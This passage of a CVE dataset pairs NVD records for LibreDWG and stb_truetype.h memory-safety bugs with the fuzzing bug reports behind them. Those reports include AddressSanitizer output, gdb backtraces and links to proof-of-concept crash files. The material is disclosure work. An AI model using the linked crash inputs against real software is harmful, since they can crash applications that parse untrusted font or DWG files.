fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
989
CVE-2020-6615
2020-01-08T21:15:11.693
GNU LibreDWG 0.9.3.2564 has an invalid pointer dereference in dwg_dynapi_entity_value in dynapi.c (dynapi.c is generated by gen-dynapi.pl).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447223
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
990
CVE-2020-6617
2020-01-08T23:15:10.410
stb stb_truetype.h through 1.22 has an assertion failure in stbtt__cff_int.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/864" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/864" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "1CD78C93-4049-4174-B364-1D3843DE443F", "versionEndExcluding": null, "versionEndIncluding": "1.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/nothings/stb/issues/864
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
assertion failure in `stbtt__cff_int` can be triggered by user supplied font file. <img width="679" alt="source" src="https://user-images.githubusercontent.com/20929895/71815033-1eada180-30b9-11ea-9420-97f3dc3bda43.png"> poc: [poc.zip](https://github.com/nothings/stb/files/4025824/poc.zip) result: ``` #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00007ffff6e3339a in __assert_fail_base (fmt=0x7ffff6fba7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x505b00 <.str> "0", file=file@entry=0x505b40 <.str> "./SRC/stb_truetype.h", line=line@entry=0x49c, function=function@entry=0x5063c0 <__PRETTY_FUNCTION__.stbtt__cff_int> "stbtt_uint32 stbtt__cff_int(stbtt__buf *)") at assert.c:92 #3 0x00007ffff6e33412 in __GI___assert_fail (assertion=0x505b00 <.str> "0", file=0x505b40 <.str> "./SRC/stb_truetype.h", line=0x49c, function=0x5063c0 <__PRETTY_FUNCTION__.stbtt__cff_int> "stbtt_uint32 stbtt__cff_int(stbtt__buf *)") at assert.c:101 #4 0x00000000004e7c73 in stbtt__cff_int (b=0x7fffffffd980) at ./SRC/stb_truetype.h:1180 #5 0x00000000004ea9e6 in stbtt__cff_skip_operand (b=0x7fffffffd980) at ./SRC/stb_truetype.h:1195 #6 0x00000000004ea430 in stbtt__dict_get (b=0x7fffffffd980, key=0x11) at ./SRC/stb_truetype.h:1205 #7 0x00000000004e9bc3 in stbtt__dict_get_ints (b=0x7fffffffd980, key=0x11, outcount=0x1, out=0x7fffffffd9d0) at ./SRC/stb_truetype.h:1217 #8 0x00000000004e0924 in stbtt_InitFont_internal (info=0x7fffffffe1c0, data=0x629000000200 "OTTO", fontstart=0x0) at ./SRC/stb_truetype.h:1386 #9 0x00000000004d71a3 in stbtt_InitFont (info=0x7fffffffe1c0, data=0x629000000200 "OTTO", offset=0x0) at ./SRC/stb_truetype.h:4771 #10 0x00000000004e1b29 in main (argc=0x2, argv=0x7fffffffe458) at ../fuzzsrc/ttfuzz.c:29 #11 0x00007ffff6e24b97 in __libc_start_main (main=0x4e18f0 <main>, argc=0x2, argv=0x7fffffffe458, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe448) at ../csu/libc-start.c:310 #12 0x000000000041ad4a in _start () ```
assertion failure in stbtt__cff_int in stb_truetype.h
https://api.github.com/repos/nothings/stb/issues/864/comments
2
2020-01-06T11:18:26Z
2021-07-04T10:08:08Z
https://github.com/nothings/stb/issues/864
545,675,704
864
991
CVE-2020-6618
2020-01-08T23:15:10.487
stb stb_truetype.h through 1.22 has a heap-based buffer over-read in stbtt__find_table.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/866" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "1CD78C93-4049-4174-B364-1D3843DE443F", "versionEndExcluding": null, "versionEndIncluding": "1.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nothings/stb/issues/866
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
heap overflow in line 1281. `stbtt__find_table` doesn't check any out of bound access, so heap overflow can be triggered here. <img width="740" alt="poc" src="https://user-images.githubusercontent.com/20929895/71815229-c6c36a80-30b9-11ea-8d7a-89df9d788188.png"> poc: [poc.zip](https://github.com/nothings/stb/files/4025831/poc.zip) result: ``` ================================================================= ==52890==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000002c at pc 0x0000004c96ca bp 0x7fffffffd800 sp 0x7fffffffd7f8 READ of size 1 at 0x60200000002c thread T0 #0 0x4c96c9 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4c96c9) #1 0x4df961 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4df961) #2 0x4d71a2 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4d71a2) #3 0x4e1b28 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e1b28) #4 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x41ad49 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x41ad49) 0x60200000002c is located 12 bytes to the right of 16-byte region [0x602000000010,0x602000000020) allocated by thread T0 here: #0 0x492c4d (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x492c4d) #1 0x4e1ac8 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e1ac8) #2 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4c96c9) Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa 00 00 fa[fa]fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==52890==ABORTING Program received signal SIGABRT, Aborted. b [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x73be28 --> 0x0 RCX: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffc840 --> 0x0 RDI: 0x2 RBP: 0x7fffffffd7d0 --> 0x7fffffffd800 --> 0x7fffffffd8d0 --> 0x7fffffffe120 --> 0x7fffffffe150 --> 0x7fffffffe340 (--> ...) RSP: 0x7fffffffc840 --> 0x0 RIP: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffc840 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffffd800 --> 0x7fffffffd8d0 --> 0x7fffffffe120 --> 0x7fffffffe150 --> 0x7fffffffe340 --> 0x4f3870 (<__libc_csu_init>: push r15) R13: 0x7fffffffd7f8 --> 0x602000000014 --> 0x540e000000000180 R14: 0x7fffffffd7a0 --> 0x45e0010e R15: 0x7ce288 --> 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6e41e8b <__GI_raise+187>: mov edi,0x2 0x7ffff6e41e90 <__GI_raise+192>: mov eax,0xe 0x7ffff6e41e95 <__GI_raise+197>: syscall => 0x7ffff6e41e97 <__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108] 0x7ffff6e41e9f <__GI_raise+207>: xor rcx,QWORD PTR fs:0x28 0x7ffff6e41ea8 <__GI_raise+216>: mov eax,r8d 0x7ffff6e41eab <__GI_raise+219>: jne 0x7ffff6e41ecc <__GI_raise+252> 0x7ffff6e41ead <__GI_raise+221>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffc840 --> 0x0 0008| 0x7fffffffc848 --> 0x0 0016| 0x7fffffffc850 --> 0x0 0024| 0x7fffffffc858 --> 0x0 0032| 0x7fffffffc860 --> 0x0 0040| 0x7fffffffc868 --> 0x0 0048| 0x7fffffffc870 --> 0x0 0056| 0x7fffffffc878 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00000000004b0707 in __sanitizer::Abort() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix_libcdep.cc:154 #3 0x00000000004af0e1 in __sanitizer::Die() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:58 #4 0x0000000000496c69 in ~ScopedInErrorReport () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:186 #5 0x00000000004983df in ReportGenericError () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:470 #6 0x0000000000498ab8 in __asan_report_load1 () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_rtl.cc:117 #7 0x00000000004c96ca in stbtt__find_table (data=0x602000000010 "wOF2\200\001", fontstart=0x0, tag=0x5071a0 <.str> "cmap") at ./SRC/stb_truetype.h:1281 #8 0x00000000004df962 in stbtt_InitFont_internal (info=0x7fffffffe180, data=0x602000000010 "wOF2\200\001", fontstart=0x0) at ./SRC/stb_truetype.h:1344 #9 0x00000000004d71a3 in stbtt_InitFont (info=0x7fffffffe180, data=0x602000000010 "wOF2\200\001", offset=0x0) at ./SRC/stb_truetype.h:4771 #10 0x00000000004e1b29 in main (argc=0x2, argv=0x7fffffffe428) at ../fuzzsrc/ttfuzz.c:29 #11 0x00007ffff6e24b97 in __libc_start_main (main=0x4e18f0 <main>, argc=0x2, argv=0x7fffffffe428, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe418) at ../csu/libc-start.c:310 #12 0x000000000041ad4a in _start () ```
heap overflow in stbtt__find_table in stb_truetype.h
https://api.github.com/repos/nothings/stb/issues/866/comments
4
2020-01-06T11:24:48Z
2021-07-04T10:07:59Z
https://github.com/nothings/stb/issues/866
545,678,527
866
992
CVE-2020-6619
2020-01-08T23:15:10.567
stb stb_truetype.h through 1.22 has an assertion failure in stbtt__buf_seek.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/863" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/863" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "1CD78C93-4049-4174-B364-1D3843DE443F", "versionEndExcluding": null, "versionEndIncluding": "1.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/nothings/stb/issues/863
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
assertion failure in `stbtt__buf_seek` can be triggered by user supplied font file. <img width="483" alt="source" src="https://user-images.githubusercontent.com/20929895/71814539-b01c1400-30b7-11ea-9ca5-f57cca5d3870.png"> poc: [poc.zip](https://github.com/nothings/stb/files/4025802/poc.zip) result: ``` gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00007ffff6e3339a in __assert_fail_base (fmt=0x7ffff6fba7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x5060e0 <.str> "!(o > b->size || o < 0)", file=file@entry=0x505b40 <.str> "./SRC/stb_truetype.h", line=line@entry=0x45d, function=function@entry=0x506120 <__PRETTY_FUNCTION__.stbtt__buf_seek> "void stbtt__buf_seek(stbtt__buf *, int)") at assert.c:92 #3 0x00007ffff6e33412 in __GI___assert_fail (assertion=0x5060e0 <.str> "!(o > b->size || o < 0)", file=0x505b40 <.str> "./SRC/stb_truetype.h", line=0x45d, function=0x506120 <__PRETTY_FUNCTION__.stbtt__buf_seek> "void stbtt__buf_seek(stbtt__buf *, int)") at assert.c:101 #4 0x00000000004e7d2f in stbtt__buf_seek (b=0x7fffffffd960, o=0xffffff80) at ./SRC/stb_truetype.h:1117 #5 0x00000000004e1078 in stbtt_InitFont_internal (info=0x7fffffffe1c0, data=0x629000000200 "OTTO", fontstart=0x0) at ./SRC/stb_truetype.h:1404 #6 0x00000000004d71a3 in stbtt_InitFont (info=0x7fffffffe1c0, data=0x629000000200 "OTTO", offset=0x0) at ./SRC/stb_truetype.h:4771 #7 0x00000000004e1b29 in main (argc=0x2, argv=0x7fffffffe458) at ../fuzzsrc/ttfuzz.c:29 #8 0x00007ffff6e24b97 in __libc_start_main (main=0x4e18f0 <main>, argc=0x2, argv=0x7fffffffe458, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe448) at ../csu/libc-start.c:310 #9 0x000000000041ad4a in _start () ```
assertion failure in stbtt__buf_seek in stb_truetype.h
https://api.github.com/repos/nothings/stb/issues/863/comments
2
2020-01-06T11:15:45Z
2021-07-04T10:08:13Z
https://github.com/nothings/stb/issues/863
545,674,533
863
993
CVE-2020-6620
2020-01-08T23:15:10.627
stb stb_truetype.h through 1.22 has a heap-based buffer over-read in stbtt__buf_get8.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/868" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/868" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "1CD78C93-4049-4174-B364-1D3843DE443F", "versionEndExcluding": null, "versionEndIncluding": "1.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nothings/stb/issues/868
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
`stbtt__buf_get8` has heap overflow vulnerability. <img width="447" alt="source" src="https://user-images.githubusercontent.com/20929895/71815524-b52e9280-30ba-11ea-9864-da5063e978ef.png"> poc: [poc.zip](https://github.com/nothings/stb/files/4025840/poc.zip) result: ``` ================================================================= ==60039==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000002810 at pc 0x0000004e639b bp 0x7fffffffd6d0 sp 0x7fffffffd6c8 READ of size 1 at 0x625000002810 thread T0 #0 0x4e639a (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e639a) #1 0x4e7ad0 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e7ad0) #2 0x4e9f65 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e9f65) #3 0x4e10a4 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e10a4) #4 0x4d71a2 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4d71a2) #5 0x4e1b28 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e1b28) #6 0x7ffff6e24b96 